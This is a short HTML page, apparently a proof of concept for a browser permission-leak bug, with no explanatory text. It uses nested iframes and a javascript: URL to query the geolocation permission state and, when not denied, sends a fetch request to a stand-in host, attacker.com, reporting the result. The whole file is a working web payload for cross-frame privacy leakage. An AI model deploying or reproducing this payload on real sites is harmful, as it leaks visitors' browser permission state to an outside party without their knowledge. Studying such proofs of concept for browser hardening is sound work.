<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
</head>
<body>
<iframe id="GGGGGwPwUHGGGGG" src="about:blank"></iframe>
<script>
window.onload = function() {
    GGGGGwPwUHGGGGG.addEventListener("load",()=>{GGGGGwPwUHGGGGG.srcdoc="<iframe id=GGGGwPwUHGGGG src=about:blank><\/iframe><script>GGGGwPwUHGGGG.addEventListener('load',()=>{GGGGwPwUHGGGG.contentWindow.location.href='javascript:navigator.permissions.query({name:`geolocation`}).then(r=>{if(r.state!=`denied`)fetch(`https://attacker.com/report/report?query=1`)})';},{once:true});<\/script>";},{once:true});
};
</script>
</body>
</html>